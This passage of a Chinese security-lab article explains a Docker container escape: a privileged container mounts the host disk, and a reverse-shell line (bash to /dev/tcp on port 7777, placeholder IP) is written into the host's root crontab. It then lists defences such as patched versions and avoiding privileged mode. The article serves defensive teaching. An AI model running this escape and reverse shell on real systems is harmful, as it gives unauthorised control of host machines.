美創(chuàng)安全實驗室 | Docker逃逸原理
同理,新建一個目錄/test2,將/dev/sda3掛載到新建的目錄下,并查看test2目錄下的內(nèi)容,發(fā)現(xiàn)可以訪問宿主機上/目錄下的內(nèi)容了
在計劃任務里寫入一個反彈shell:
echo '* * * * * bash -i >& /dev/tcp/x.x.x.x/7777 0>&1'>> /test2/var/spool/cron/root
在Docker上開啟netcat監(jiān)聽7777端口,成功接收到宿主主機的Shell,實現(xiàn)Docker逃逸。
Docker逃逸防御
更新Docker版本到19.03.1及更高版本——CVE-2019-14271、覆蓋CVE-2019-5736。
runc版本 >1.0-rc6
k8s 集群版本>1.12
Linux內(nèi)核版本>=2.6.22——CVE-2016-5195(臟牛)
Linux內(nèi)核版本>=4.14——CVE-2017–1000405(大臟牛),未找到docker逃逸利用過程,但存在逃逸風險。
不建議以root權(quán)限運行Docker服務。
不建議以privileged(特權(quán)模式)啟動Docker。
不建議將宿主機目錄掛載至容器目錄。
不建議將容器以—cap-add=SYSADMIN啟動,SYSADMIN意為container進程允許執(zhí)行mount、umount等一系列系統(tǒng)管理操作,存在容器逃逸風險。
美創(chuàng)科技聚焦數(shù)據(jù)安全,圍繞數(shù)據(jù)安全、災難備份、數(shù)據(jù)管理、智能運維等多方面挖掘和鑄造數(shù)據(jù)價值,憑借卓越的產(chǎn)品技術和服務贏得了眾多行業(yè)的認可和用戶口碑!
請輸入評論內(nèi)容...
請輸入評論/評論長度6~500個字
圖片新聞
最新活動更多
- 高級軟件工程師 廣東省/深圳市
- 自動化高級工程師 廣東省/深圳市
- 光器件研發(fā)工程師 福建省/福州市
- 銷售總監(jiān)(光器件) 北京市/海淀區(qū)
- 激光器高級銷售經(jīng)理 上海市/虹口區(qū)
- 光器件物理工程師 北京市/海淀區(qū)
- 激光研發(fā)工程師 北京市/昌平區(qū)
- 技術專家 廣東省/江門市
- 封裝工程師 北京市/海淀區(qū)
- 結(jié)構(gòu)工程師 廣東省/深圳市